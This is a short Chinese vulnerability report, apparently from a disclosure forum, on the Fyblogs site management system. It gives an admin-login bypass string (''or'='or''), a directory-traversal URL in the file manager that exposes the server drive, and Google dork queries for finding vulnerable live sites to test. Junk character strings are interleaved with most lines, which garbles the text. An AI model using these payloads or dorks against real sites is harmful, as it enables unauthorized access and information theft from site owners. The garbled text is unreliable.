漏洞类型: 未授权访问/权限绕过
2 S V0 \ S1 c6 e8 s
! V. t9 \7 }6 n9 h* T" s简要描述:
$ i% K, F4 Z l% J) s. c3 P8 Q4 n+ R, v2 q2 |9 g0 k
Fyblogs网站管理系统,,后台存在万能密码,后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!; H/ }' s3 V+ a& H
4 D- y3 }9 G- J% `; O# m
详细说明:
( ~# y$ P' @$ u( g7 L- n9 R I$ x# a! \$ ^1 Y" R1 r
后台万能密码 'or'='or'
8 I4 j8 F# c; A后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
# c# Z3 k% O4 A9 ]8 A2 u0 h; qadmin/uploadfile.asp?currentFolder=/upfiles/../5 p2 ?5 Q1 n) `
5 S- F$ q: n1 B1 s' u漏洞证明:
- f) L( A b, O) y( Z; g2 B% S: n% J
谷歌:inurl:type.asp?id=1 新闻中心3 J* ~8 j8 O3 u
或者 :inurl:download_ok.asp?% A, T' z0 c2 {, z
% h9 M0 @: F7 ]( O& U. V/ k$ s
可以测试
; o" Y0 j: \8 J+ c8 @/ L) `+ w' R D! M; V$ [' t3 G* k% c
6 ^, u `* q o, i7 m$ O6 S9 h
|